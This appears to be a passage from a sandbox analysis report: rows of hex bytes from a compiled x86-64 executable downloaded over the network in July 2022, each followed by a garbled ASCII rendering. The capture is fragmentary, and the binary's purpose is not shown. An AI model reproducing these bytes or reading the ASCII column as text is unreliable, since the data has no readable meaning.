39 6c 24 30 b8 20 00 00 00 c6 07 30 8d 48 0d 0f 44 c1 e9 76 f5 ff ff cc 40 55 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 68 48 8d 6c 24 30 48 8b 05 fb
                                                                  Data Ascii: E3D6DCA+T$pDD$tD$xDd${0AMA;~DL$xM+AM+<5|nA:9uA0M+L;sL;sMfDED*AIDSDdAH$H3H$HA_A^A]A\_^]A:0uM+L;sL;sfD9l$0 0HDv@USVWATAUAVAWHhHl$0H
                                                                  2022-07-15 01:58:15 UTC195INData Raw: ff ff ff 40 38 74 24 48 74 0c 48 8b 44 24 40 83 a0 c8 00 00 00 fd 48 8b c3 e9 66 ff ff ff cc cc 45 33 c0 e9 00 ff ff ff eb 07 3a c2 74 0d 48 ff c1 8a 01 84 c0 75 f3 3a c2 75 04 48 8b c1 c3 33 c0 c3 ff 25 68 6a 06 00 ff 25 9a 6a 06 00 ff 25 9c 6a 06 00 ff 25 a6 6a 06 00 cc cc 48 63 41 fc 48 2b c8 e9 38 8d 04 00 48 63 41 fc 48 2b c8 e9 9c 81 02 00 48 63 41 fc 48 2b c8 e9 30 ea fd ff 66 0f 2e 05 88 9d 06 00 73 14 66 0f 2e 05 86 9d 06 00 76 0a f2 48 0f 2d c8 f2 48 0f 2a c1 c3 cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 73 16 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 75 f0 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 c3 cc
                                                                  Data Ascii: @8t$HtHD$@HfE3:tHu:uH3%hj%j%j%jHcAH+8HcAH+HcAH+0f.sf.vH-H*ffHL$L\$M3LT$L+MBeL%M;sfAMAM;uL$L\$H
                                                                  2022-07-15 01:58:15 UTC199INData Raw: 4b 48 8b 08 45 33 c9 48 c7 44 24 30 00 00 00 00 45 8d 41 07 ba 00 00 00 c0 c7 44 24 28 80 00 00 00 c7 44 24 20 04 00 00 00 ff 15 7c 56 06 00 48 89 03 48 83 f8 ff 74 3d 33 d2 48 8b cb 44 8d 42 02 e8 65 19 fe ff 90 e9 6e 43 fe ff 41 f6 c0 02 74 23 48 c7 44 24 30 00 00 00 00 c7 44 24 28 80 00 00 00 ba 00 00 00 c0 c7 44 24 20 02 00 00 00 e9 32 43 fe ff 32 c0 e9 4a 43 fe ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc a8 10 0f 85 c4 42 fe ff a8 01 74 0b 48 83 79 18 00 0f 85 b5 42 fe ff a8 20 74 25 48 8d 15 22 b1 06 00 41 b8 02 00 00 00 e8 a3 ec 01 00 c7 43 44 01 00 00 00 c7 43 48 02 00 00 00 e9 8c 42 fe ff a8 40 74 25 48 8d 15 49 b9 06 00 41 b8 02 00 00 00 e8 7a ec 01 00 c7 43 44 02 00 00 00 c7 43 48 02 00 00 00 e9 63 42 fe ff 84 c0 79 25 48 8d 15 e4 b9 06 00
                                                                  Data Ascii: KHE3HD$0EAD$(D$ |VHHt=3HDBenCAt#HD$0D$(D$ 2C2JCBtHyB t%H"ACDCHB@t%HIAzCDCHcBy%H
                                                                  2022-07-15 01:58:15 UTC203INData Raw: 8d 14 43 4f 8d 44 00 02 e8 f9 39 fe ff 48 29 77 08 48 8b 7c 24 20 48 8b 74 24 38 48 8b 5c 24 30 48 83 c4 28 c3 cc 49 83 c8 ff 33 d2 e8 75 f4 fc ff 90 e9 f2 da fd ff b9 08 00 00 00 e9 0e db fd ff cc cc cc cc cc 4a 8d 04 58 e9 40 f4 fc ff cc cc cc cc cc cc cc ff c5 e9 f4 03 fd ff 45 84 ed 74 11 b8 22 00 00 00 ff c7 48 ff c6 66 89 44 74 3e eb 03 41 b7 01 ff c5 45 84 ed 0f 84 f5 03 fd ff e9 d6 04 fd ff ff c5 e9 9c 04 fd ff 45 84 ff 0f 85 da 04 fd ff 45 84 ed 0f 84 0a 05 fd ff 8d 47 ff 48 63 c8 48 63 84 24 80 20 00 00 48 3b c8 48 8b d0 7c 12 0f b7 44 4c 40 48 ff c9 48 3b ca 66 89 44 4c 44 7d ee b8 22 00 00 00 ff c7 66 89 44 54 40 e9 a1 04 fd ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 33 db e9 3a 31 fe ff cc cc cc cc cc cc cc cc cc 48 8d 8b 80 02 00 00 e8 f4
                                                                  Data Ascii: COD9H)wH|$ Ht$8H\$0H(I3uJX@Et"HfDt>AEEEGHcHc$ H;H|DL@HH;fDLD}"fDT@3:1H
                                                                  2022-07-15 01:58:15 UTC207INData Raw: 6d f5 fc ff 41 0f b7 14 6e 44 8b dd 66 83 fa 41 0f 82 0a 00 00 00 66 83 fa 5a 0f 86 6f 00 00 00 66 83 fa 61 0f 82 0a 00 00 00 66 83 fa 7a 0f 86 5b 00 00 00 66 83 fa 30 0f 82 0a 00 00 00 66 83 fa 39 0f 86 47 00 00 00 66 83 fa 5f 0f 84 3d 00 00 00 48 83 7c 24 48 00 0f 84 94 01 00 00 48 8d 4c 24 30 ba 35 00 00 00 e8 f4 03 fd ff 48 8d 54 24 40 48 8d 4c 24 30 e8 85 04 fd ff 48 8d 54 24 30 49 8b cd e8 b8 02 fd ff 90 e9 07 fd fc ff 48 8d 4c 24 40 e8 b8 f9 fc ff ff c5 66 41 8b 14 6e e9 67 ff ff ff 8b ac 24 a0 00 00 00 e9 cb fb fc ff 66 83 fa 39 0f 86 be 00 fd ff e9 d6 00 fd ff 48 8d 4c 24 30 ba 4a 00 00 00 e8 92 03 fd ff ff c5 66 41 83 3c 6e 3d 0f 85 11 00 00 00 48 8d 4c 24 30 ba 53 00 00 00 ff c5 e8 73 03 fd ff 48 8d 54 24 30 49 8b cd e8 46 02 fd ff 90 e9 95 fc
                                                                  Data Ascii: mAnDfAfZofafz[f0f9Gf_=H|$HHL$05HT$@HL$0HT$0IHL$@fAng$f9HL$0JfA<n=HL$0SsHT$0IF
                                                                  2022-07-15 01:58:15 UTC211INData Raw: 38 d7 fc ff 32 c0 e9 6a f6 fc ff cc 48 8d 0d c1 1b 09 00 e8 24 ac 00 00 48 8b c8 e9 40 d4 fc ff 48 8d 0d ad 1b 09 00 e8 10 ac 00 00 48 8b c8 e9 86 d4 fc ff 48 8d 54 24 30 48 8d 4c 24 70 c6 05 3f 06 08 00 01 ff cf e8 00 d0 fc ff 48 8b 5c 24 30 e9 ff d4 fc ff 48 8d 54 24 30 48 8d 4c 24 70 c6 05 1c 06 08 00 01 ff cf e8 de cf fc ff 48 8b 5c 24 30 e9 f4 d4 fc ff 8b c6 40 84 ed 41 b8 04 01 00 00 0f 94 c0 49 8b d4 33 c9 89 05 a3 10 09 00 c6 05 a0 10 09 00 01 ff 15 6e 27 06 00 48 8d 54 24 30 48 8d 4c 24 70 e8 9f cf fc ff 48 8d 54 24 30 48 8d 0d 83 10 09 00 e8 2e d7 fd ff 48 8d 54 24 30 48 8d 4c 24 70 83 ef 02 e8 7c cf fc ff 48 8b 5c 24 30 e9 a9 d4 fc ff 89 35 54 10 09 00 e9 c4 d4 fc ff 48 8b d3 49 8b cc e8 48 1f fe ff 48 8d 54 24 30 48 8d 4c 24 70 ff cf e8 4b cf
                                                                  Data Ascii: 82jH$H@HHHT$0HL$p?H\$0HT$0HL$pH\$0@AI3n'HT$0HL$pHT$0H.HT$0HL$p|H\$05THIHHT$0HL$pK
                                                                  2022-07-15 01:58:15 UTC215INData Raw: e9 cb f2 fc ff 48 8b 44 24 30 48 8b 08 66 83 39 30 0f 85 3a 00 00 00 0f b7 41 02 66 83 f8 78 74 06 66 83 f8 58 75 2a 48 8d 94 24 90 00 00 00 48 83 c1 04 41 b8 08 00 00 00 e8 f9 9f 00 00 66 0f ef f6 f2 48 0f 2a b4 24 90 00 00 00 e9 7f f2 fc ff e8 b5 25 fe ff 66 0f 28 f0 e9 71 f2 fc ff 66 0f ef f6 f2 48 0f 2a 74 24 20 e9 61 f2 fc ff 66 0f 6e 74 24 20 f3 0f e6 f6 e9 52 f2 fc ff f2 0f 10 74 24 20 e9 47 f2 fc ff f2 0f 10 7f 30 e9 3d f2 fc ff 66 0f ef ff f2 48 0f 2a 7f 30 e9 2e f2 fc ff 83 e9 02 0f 84 96 00 00 00 83 e9 01 0f 84 69 00 00 00 83 e9 01 74 35 83 e9 03 74 0e 83 f9 02 0f 84 39 f2 fc ff e9 53 f2 fc ff 48 8d 4f 18 e8 d2 33 02 00 48 8b ce 48 8b d8 e8 c7 33 02 00 48 3b d8 0f 82 ae f2 fc ff e9 31 f2 fc ff 48 8b ce e8 d1 b9 fd ff 48 8d 4f 18 48 8b d8 e8 c5
                                                                  Data Ascii: HD$0Hf90:AfxtfXu*H$HAfH*$%f(qfH*t$ afnt$ Rt$ G0=fH*0.it5t9SHO3HH3H;1HHOH
                                                                  2022-07-15 01:58:15 UTC227INData Raw: 08 00 8b 08 41 89 0b 48 8b 03 48 63 08 85 c9 0f 84 2f 00 00 00 e8 be e2 fd ff 4c 8b d8 48 8b 03 4c 89 58 08 48 8b 0b 48 8b 15 5a fc 08 00 4c 63 01 48 8b 49 08 48 8b 52 08 e8 d2 da fd ff 90 e9 d0 cc fc ff b9 01 00 00 00 e8 8a e2 fd ff 4c 8b d8 48 8b 03 4c 89 58 08 48 8b 03 48 8b 48 08 c6 01 00 e9 ad cc fc ff b9 28 00 00 00 e8 67 e2 fd ff 48 85 c0 0f 84 17 00 00 00 48 8b 15 07 fc 08 00 48 8b c8 e8 97 98 04 00 48 89 03 e9 83 cc fc ff 48 8b c5 48 89 03 e9 78 cc fc ff 33 ff e9 7e d1 fc ff 48 8b 44 24 40 48 8b 78 18 e9 85 cc fc ff ba 01 00 00 00 e8 05 a9 01 00 48 c7 47 10 00 00 00 00 e9 7e cc fc ff 48 8b 0f 48 85 c9 0f 84 7e cc fc ff ff 15 96 eb 05 00 48 8b 0f e8 7e dd fd ff 90 e9 8e cc fc ff 48 8b 0f 48 85 c9 0f 84 82 cc fc ff ba 01 00 00 00 e8 d2 81 01 00 90
                                                                  Data Ascii: AHHc/LHLXHHZLcHIHRLHLXHHH(gHHHHHHx3~HD$@HxHG~HH~H~HH
                                                                  2022-07-15 01:58:15 UTC231INData Raw: 24 60 0f 85 a1 00 00 00 48 8b 54 17 10 0f b7 42 08 66 83 f8 4a 74 2b 66 83 f8 49 74 25 48 8d 8c 24 88 00 00 00 e8 0d a2 fc ff eb 38 41 83 c8 ff ba 91 00 00 00 48 8b cb e8 ca 61 03 00 e9 e6 01 00 00 48 8d 8c 24 88 00 00 00 e8 e8 a1 fc ff 49 8b 56 08 48 8d 8c 24 88 00 00 00 48 8b 14 16 e8 d3 a1 fc ff 48 8d 4c 24 58 ba 7f 00 00 00 e8 e4 a2 fc ff 48 8d 54 24 58 48 8d 8c 24 88 00 00 00 e8 b2 a1 fc ff 4c 8d 4c 24 30 4c 8d 44 24 50 48 8d 94 24 88 00 00 00 48 8b cb c7 44 24 20 ff ff ff ff e8 c0 b7 fc ff eb 1a 48 8d 4c 24 30 e8 f4 da fc ff c7 44 24 38 01 00 00 00 c7 44 24 30 00 00 00 00 49 8b 46 08 4c 8d 44 24 30 48 8d 0d 5c ca 08 00 48 8b 14 07 45 33 c9 c7 44 24 20 01 00 00 00 48 8b 12 e8 0d 90 04 00 48 8d 4c 24 58 e8 a3 f4 01 00 48 8d 8c 24 88 00 00 00 e8 b6 85
                                                                  Data Ascii: $`HTBfJt+fIt%H$8AHaH$IVH$HHL$XHT$XH$LL$0LD$PH$HD$ HL$0D$8D$0IFLD$0H\HE3D$ HHL$XH$
                                                                  2022-07-15 01:58:15 UTC247INData Raw: 73 97 05 00 48 89 03 48 85 c0 74 14 48 8d 15 34 52 06 00 48 8b c8 ff 15 53 97 05 00 48 89 43 10 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 e8 b2 ff ff ff 45 33 db 4c 39 5b 10 0f 95 c0 48 83 c4 20 5b c3 cc cc 40 53 48 83 ec 20 48 8b d9 e8 d2 ff ff ff 84 c0 74 06 48 8b 43 10 eb 07 48 8d 05 a1 46 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 8b 09 48 85 c9 74 06 ff 15 f6 96 05 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 33 c9 e8 20 b5 fd ff 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc 40 53 48 83 ec 20 48 8d 05 1b 45 06 00 48 8b d9 48 89 01 e8 b8 43 00 00 48 8b 4b 08 48 83 c4 20 5b e9 ea 8a fd ff cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 33 d2 e8 d5 1a 00 00 33 c9 3a c1 0f 94 c0 48 83 c4 28 c3 cc
                                                                  Data Ascii: sHHtH4RHSHCH [@SH HE3L9[H [@SH HtHCHFH [H(HHtH(@SH H3 HHH [@SH HEHHCHKH [H(33:H(
                                                                  2022-07-15 01:58:15 UTC259INData Raw: 94 7b fd ff 41 3a ff 75 0b 48 8b d6 48 8b cd e8 38 62 fd ff 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 b8 b0 10 00 00 e8 51 00 ff ff 48 2b e0 48 8b ea 48 8b f9 ba 2a 00 00 00 49 8b c9 49 8b d9 49 8b f0 e8 fd 7a fd ff 45 33 e4 49 3b c4 75 15 48 8b 8c 24 e0 10 00 00 48 8b d3 e8 b9 61 fd ff e9 5a 01 00 00 48 8d 44 24 30 4c 8d 8c 24 a0 0e 00 00 4c 8d 84 24 80 0a 00 00 48 8d 94 24 60 06 00 00 48 8b cf 48 89 44 24 20 e8 7a 75 fd ff 4c 8d 9c 24 50 04 00 00 4c 8d 8c 24 90 0c 00 00 4c 8d 84 24 80 0a 00 00 48 8d 94 24 60 06 00 00 48 8b cb 4c 89 5c 24 20 e8 4d 75 fd ff 66 83 7c 24 30 2e 75 0f 48 8d 54 24 32 48 8d 4c
                                                                  Data Ascii: {A:uHH8bH\$PHl$XHt$`H A_A^A]A\_HHXHhHpHx ATQH+HH*IIIzE3I;uH$HaZHD$0L$L$H$`HHD$ zuL$PL$L$H$`HL\$ Muf|$0.uHT$2HL
                                                                  2022-07-15 01:58:15 UTC275INData Raw: 03 83 e9 06 41 ff c9 83 e0 3f d3 e0 44 0b c0 48 ff c3 eb e5 8b 4c 24 50 41 83 f8 0a 0f 82 6c fc ff ff 41 83 f8 0d 76 23 41 81 f8 85 00 00 00 74 1a 41 81 f8 27 20 00 00 0f 86 50 fc ff ff 41 81 f8 29 20 00 00 0f 87 43 fc ff ff 49 ff c2 4c 89 94 24 e8 01 00 00 e9 d2 31 00 00 48 3b 9f 88 00 00 00 0f 83 5c 03 00 00 44 0f b6 03 48 ff c3 85 c9 74 55 41 81 f8 c0 00 00 00 72 4c 41 8b c0 48 8d 15 7a b3 fb ff 83 e0 3f 44 0f b6 8c 10 b0 ca 09 00 49 8b c1 42 8b 94 8a 90 ca 09 00 43 8d 0c 49 44 23 c2 03 c9 41 d3 e0 45 85 c9 7e 16 0f b6 03 83 e9 06 41 ff c9 83 e0 3f d3 e0 44 0b c0 48 ff c3 eb e5 8b 4c 24 50 41 83 f8 0a 0f 82 79 ff ff ff 41 83 f8 0d 0f 86 b2 fb ff ff 41 81 f8 85 00 00 00 0f 84 a5 fb ff ff 41 81 f8 27 20 00 00 0f 86 55 ff ff ff 41 81 f8 29 20 00 00 0f 86
                                                                  Data Ascii: A?DHL$PAlAv#AtA' PA) CIL$1H;\DHtUArLAHz?DIBCID#AE~A?DHL$PAyAAA' UA)
                                                                  2022-07-15 01:58:15 UTC291INData Raw: fd ff ff 45 0f b6 42 04 41 0f b6 42 05 41 c1 e0 08 44 0b c0 41 81 f8 ff ff 00 00 0f 84 29 01 00 00 44 3b 41 08 0f 84 1f 01 00 00 83 64 24 64 00 83 fa 67 0f 85 72 01 00 00 48 8b 6f 30 45 33 c9 44 3b 4f 28 44 89 4c 24 60 0f 8d 5c 01 00 00 0f b6 4d 00 0f b6 45 01 c1 e1 08 0b c8 41 3b c8 74 10 48 63 47 2c 41 ff c1 48 03 e8 44 3b 4f 28 7c de 44 3b 4f 28 44 89 4c 24 60 0f 8d 2b 01 00 00 48 8b d5 48 3b 6f 30 76 52 48 63 47 2c 48 8d 4d 02 48 2b d0 48 89 54 24 70 48 83 c2 02 e8 be 0d fd ff 85 c0 75 28 48 8b 54 24 70 0f b6 02 0f b6 4a 01 c1 e0 08 0b c8 48 8b 87 c8 00 00 00 3b 48 08 74 7f 83 64 24 64 00 48 3b 57 30 77 bb 4c 8b 94 24 e8 01 00 00 44 8b 4c 24 60 41 ff c1 44 3b 4f 28 44 89 4c 24 60 0f 8d be 00 00 00 48 8d 4d 02 48 89 4c 24 70 48 63 47 2c 48 03 e8 48 8d
                                                                  Data Ascii: EBABADA)D;Ad$dgrHo0E3D;O(DL$`\MEA;tHcG,AHD;O(|D;O(DL$`+HH;o0vRHcG,HMH+HT$pHu(HT$pJH;Htd$dH;W0wL$DL$`AD;O(DL$`HMHL$pHcG,HH
                                                                  2022-07-15 01:58:15 UTC307INData Raw: 8c 31 ff ff 8b 44 24 50 48 8b 74 24 38 42 89 7c d3 1c 42 89 44 d3 20 41 8d 42 01 89 43 18 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 20 44 8b 7a 08 4d 63 f0 be 03 00 00 00 48 8b da 48 8b f9 44 8d 6e 15 44 39 b2 9c 02 00 00 0f 84 a9 00 00 00 39 b1 e4 00 00 00 44 8b e6 0f 8c 93 00 00 00 49 8b ed 48 8b 87 c8 00 00 00 48 8b 0c 28 48 83 39 00 74 6b 48 8b 09 44 39 79 08 75 62 8a 91 f4 00 00 00 80 fa 0b 74 57 0f b6 81 f7 00 00 00 3b 83 9c 02 00 00 74 12 80 bb a4 02 00 00 00 74 3f 3c ff 74 3b 80 fa 0a 74 36 48 8b 09 33 d2 ff 15 16 b1 04 00 4c 8b 9f c8 00 00 00 49 8b 04 2b 48 8b 08 f6 81 f6 00 00 00 40 74 14 80 b9 f4 00 00 00 1a 75 0b 48 8b 09 33 d2 ff 15 5b af 04 00 41 ff
                                                                  Data Ascii: 1D$PHt$8B|BD ABCH\$0H _H\$Hl$Ht$WATAUAVAWH DzMcHHDnD99DIHH(H9tkHD9yubtW;tt?<t;t6H3LI+H@tuH3[A
                                                                  2022-07-15 01:58:15 UTC323INData Raw: 48 83 ec 20 0f b7 fa 48 8b d9 e8 51 37 ff ff 33 ed 40 3a c5 74 2f 48 8b 43 18 48 83 ce ff 48 8b cb 01 30 e8 b8 0c fc ff 44 8d 5d 08 8d 45 02 4c 89 5b 10 49 f7 e3 48 0f 40 c6 48 8b c8 e8 96 62 fc ff 48 89 03 48 8b 03 48 8b 74 24 40 48 c7 43 08 01 00 00 00 66 89 38 48 8b 03 66 89 68 02 48 8b 6c 24 38 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 48 39 01 0f 95 c0 c3 cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 18 48 89 70 20 57 48 83 ec 70 83 48 10 ff 49 8b f8 8b da 85 d2 75 14 48 8b 05 b8 5e 07 00 49 89 00 b8 01 00 00 00 e9 ac 00 00 00 83 fa 05 0f 84 a1 00 00 00 83 fa 06 0f 84 98 00 00 00 48 8d 2d 92 5e 07 00 83 fa 03 74 22 83 fa 04 74 1d 4c 8d 84 24 88 00 00 00 48 8b cd e8 c8 0b ff ff 84 c0 74 73 8b 84 24
                                                                  Data Ascii: H HQ73@:t/HCHH0D]EL[IH@HbHHHt$@HCf8HfhHl$8HH\$0H _3H9HHXHhHp WHpHIuH^IH-^t"tL$Hts$
                                                                  2022-07-15 01:58:15 UTC339INData Raw: 5d e9 ea 7f fe ff cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 10 48 89 68 18 48 89 70 20 48 89 48 08 57 41 54 41 55 41 56 41 57 48 83 ec 30 45 33 ff 48 8b ca 49 8b d8 45 8d 67 01 48 8b fa 45 8d 77 fe 44 89 64 24 60 ff 15 d9 25 04 00 44 88 25 ea 1e 07 00 e9 05 01 00 00 33 f6 45 8b ce 45 8b c7 44 89 64 24 28 21 74 24 20 33 ed e8 cd f7 ff ff 39 73 18 0f 8e bb 00 00 00 4c 8d a3 1c 08 00 00 4c 8d 6b 1c 41 80 3c 24 08 0f 82 8e 00 00 00 3b ee 74 1f 48 63 c5 44 8b ce 48 8b cf 4c 8d 84 18 1c 08 00 00 48 8d 54 c3 1c 44 2b cd ff 15 6b 25 04 00 41 8a 04 24 8d 6e 01 3c 14 74 60 3c 08 75 50 41 83 ff ff 74 12 48 8d 0d 2f 1d 07 00 45 8b c6 48 8b d7 e8 14 7f fe ff 41 83 7d 00 ff 8b 44 24 60 48 8d 0d 14 1d 07 00 45 0f 45 7d 00 41 83 7d 04 ff 89 44 24 28 45 0f 45 75 04
                                                                  Data Ascii: ]HHXHhHp HHWATAUAVAWH0E3HIEgHEwDd$`%D%3EEDd$(!t$ 39sLLkA<$;tHcDHLHTD+k%A$n<t`<uPAtH/EHA}D$`HEE}A}D$(EEu
                                                                  2022-07-15 01:58:15 UTC355INData Raw: c0 88 47 48 40 f6 c6 01 74 0a 81 8f 90 00 00 00 00 00 00 80 40 f6 c6 02 74 0a 81 8f 90 00 00 00 00 30 00 00 8b c6 83 e0 04 74 0d 40 f6 c6 08 75 0d 83 8f 90 00 00 00 01 40 f6 c6 08 74 0b 85 c0 75 07 83 8f 90 00 00 00 02 40 f6 c6 10 74 07 c6 87 9c 01 00 00 00 48 8b 4c 24 50 e8 40 85 fa ff 48 8b 5c 24 30 48 8b 74 24 38 48 8b c7 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 a2 a7 fb ff 48 8b cb e8 ca dd fb ff 48 8b c3 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 8b d9 e8 62 65 ff ff 33 d2 3a c2 74 0d 48 8b 03 83 38 29 75 05 ba 01 00 00 00 8a c2 48 83 c4 20 5b c3 cc cc cc cc cc cc cc 48 83 ec 28 48 8b 09 48 85 c9 74 0a ba 01 00 00 00 e8 da a8 ff ff 48 83 c4 28 c3 cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 d2 ff ff ff 48
                                                                  Data Ascii: GH@t@t0t@u@tu@tHL$P@H\$0Ht$8HH _@SH HHHH [@SH Hbe3:tH8)uH [H(HHtH(@SH HH
                                                                  2022-07-15 01:58:15 UTC371INData Raw: ff 44 88 27 48 8b 5c 24 70 48 8b 94 24 a8 00 00 00 48 ff c7 e9 35 fc ff ff 41 b8 27 00 00 00 41 3a c0 74 04 3c 34 75 43 4c 8d 05 d1 33 fa ff 0f b6 c0 42 0f b6 84 00 e0 c9 09 00 48 03 d0 48 89 94 24 a8 00 00 00 3b cd 74 21 80 7a ff c0 72 1b 0f b6 42 ff 83 e0 3f 42 0f b6 84 00 b0 ca 09 00 48 03 d0 48 89 94 24 a8 00 00 00 8b f7 2b f2 3b f5 0f 8e 82 f7 ff ff 0f b6 02 83 f8 30 7f 4b 74 44 83 f8 1f 74 32 83 f8 21 74 28 83 f8 23 74 1e 83 f8 25 74 14 83 f8 2c 74 0a 83 f8 2e 75 44 c6 02 36 eb 17 c6 02 35 eb 12 c6 02 2b eb 0d c6 02 2a eb 08 c6 02 29 eb 03 c6 02 28 48 8b 5c 24 70 e9 34 f7 ff ff c6 02 37 eb f1 83 f8 32 74 72 83 f8 39 74 65 83 f8 3b 74 5b 83 f8 3d 74 51 83 f8 3f 74 47 48 8d 4a 03 4c 63 c6 e8 21 9a fb ff 48 8b 84 24 a8 00 00 00 83 c6 03 c6 00 5d c6 47
                                                                  Data Ascii: D'H\$pH$H5A'A:t<4uCL3BHH$;t!zrB?BHH$+;0KtDt2!t(#t%t,t.uD65+*)(H\$p472tr9te;t[=tQ?tGHJLc!H$]G
                                                                  2022-07-15 01:58:15 UTC387INData Raw: 73 60 48 89 73 68 48 89 73 70 48 89 73 78 48 89 b3 80 00 00 00 89 bb 88 00 00 00 89 bb 8c 00 00 00 48 89 b3 90 00 00 00 e8 23 f1 fa ff 48 89 b3 b8 00 00 00 48 89 b3 c0 00 00 00 89 b3 c8 00 00 00 48 89 b3 d8 00 00 00 c7 83 d0 00 00 00 01 00 00 00 48 89 b3 e0 00 00 00 40 88 b3 fc 00 00 00 48 8b 74 24 38 66 89 bb e8 00 00 00 66 89 bb ec 00 00 00 66 89 bb ee 00 00 00 66 89 bb f0 00 00 00 66 89 bb f2 00 00 00 c6 83 f7 00 00 00 ff 89 bb 00 01 00 00 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 81 ec 50 01 00 00 33 f6 49 8b f8 48 8b da 4c 3b c6 75 09 48 8d 15 ea a9 03 00 eb 30 48 8d 54 24 20 e8 2e 75 ff ff 4c 8d 4c 24 20 48 8d 4c 24 50 4c 8b c7 ba 80 00 00 00 e8 97 bf fb ff 48 3b c6 75 05 66
                                                                  Data Ascii: s`HshHspHsxHH#HHHH@Ht$8fffffHH\$0H _H\$Ht$WHP3IHL;uH0HT$ .uLL$ HL$PLH;uf
                                                                  2022-07-15 01:58:15 UTC403INData Raw: e4 00 00 00 4c 89 44 24 30 0f 8e f1 fe ff ff 0f b6 83 f7 00 00 00 8b 8c 24 f8 00 00 00 3b c1 75 0a 3b 8d 98 02 00 00 75 16 eb 12 83 8d 9c 02 00 00 ff 0f b6 83 f7 00 00 00 3b c8 7e 02 ff c9 44 8b c1 48 8b d5 48 8b ce c6 83 f7 00 00 00 ff e8 dc 7f fe ff ff 8d 98 02 00 00 33 c9 89 8d a0 02 00 00 e9 9f 02 00 00 48 63 86 e4 00 00 00 3b c7 48 8b c8 7c 51 48 c1 e1 03 8b d8 48 89 4c 24 30 48 8b 86 c8 00 00 00 48 8b 04 01 4c 39 10 74 1e 48 8b 00 80 b8 f4 00 00 00 0b 75 12 8b d3 48 8b ce e8 ba fa ff ff 48 8b 4c 24 30 45 33 d2 48 83 e9 08 ff cb 3b df 48 89 4c 24 30 7d c3 48 8b 5c 24 38 48 83 ca ff 4c 89 95 90 02 00 00 89 95 98 02 00 00 89 95 9c 02 00 00 44 89 95 a0 02 00 00 44 88 95 a4 02 00 00 48 8b 0b ff 15 40 2f 03 00 48 8b 4b 78 48 85 c9 0f 84 09 02 00 00 ff 15
                                                                  Data Ascii: LD$0$;u;u;~DHH3Hc;H|QHHL$0HHL9tHuHHL$0E3H;HL$0}H\$8HLDDH@/HKxH
                                                                  2022-07-15 01:58:15 UTC419INData Raw: 48 03 ce e8 98 70 fa ff 48 8b cf e8 30 ee f9 ff 83 0f ff 4c 8d 9c 24 40 02 00 00 c7 47 08 01 00 00 00 33 c0 49 8b 5b 18 49 8b 73 20 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 4a 08 49 8b d8 48 8b 09 e8 bb 65 fe ff 84 c0 75 12 48 8b cb e8 df ed f9 ff 83 23 00 c7 43 08 01 00 00 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 40 48 8b 42 08 49 8b f8 48 8b 08 e8 c7 8c fa ff 48 8b 08 48 89 4c 24 20 48 8b 48 08 48 89 4c 24 28 48 8b 48 10 48 8b 40 18 ff 00 48 89 4c 24 30 48 8d 4c 24 20 48 89 44 24 38 e8 d8 d3 fa ff 48 8d 54 24 20 48 8d 0d f4 dc 05 00 e8 87 99 ff ff 48 8b cf 8b d8 e8 5d ed f9 ff 48 8d 4c 24 20 c7 47 08 01 00 00 00 89 1f e8 1a 99 f9 ff 48 8b 5c 24 50 33 c0 48 83
                                                                  Data Ascii: HpH0L$@G3I[Is I_@SH HJIHeuH#C3H [H\$WH@HBIHHHL$ HHHL$(HHH@HL$0HL$ HD$8HT$ HH]HL$ GH\$P3H
                                                                  2022-07-15 01:58:15 UTC435INData Raw: 4d fa ff 48 8d 4c 24 20 48 8b d0 e8 f0 59 fa ff 48 8b 43 08 48 8b 48 08 48 8b 18 e8 70 55 ff ff 48 8b cb 48 8b f8 e8 55 3c fa ff 4c 8b 4c 24 20 48 8d 0d c9 9d 05 00 4c 8b c7 8b d0 e8 3f a0 fe ff 48 8b ce 8b d8 e8 f5 ad f9 ff 48 8d 4c 24 20 c7 46 08 01 00 00 00 89 1e e8 b2 59 f9 ff 48 8b 5c 24 50 48 8b 74 24 58 33 c0 48 83 c4 40 5f c3 40 53 48 83 ec 20 33 c0 49 8b d8 48 39 42 10 76 0c 48 8b 42 08 48 8b 08 e8 b3 c6 fe ff 83 3d 8c 9d 05 00 00 75 14 48 8b cb e8 a2 ad f9 ff 83 23 00 c7 43 08 01 00 00 00 eb 0f 48 8d 0d 4f 9d 05 00 48 8b d0 e8 a7 05 fe ff 33 c0 48 83 c4 20 5b c3 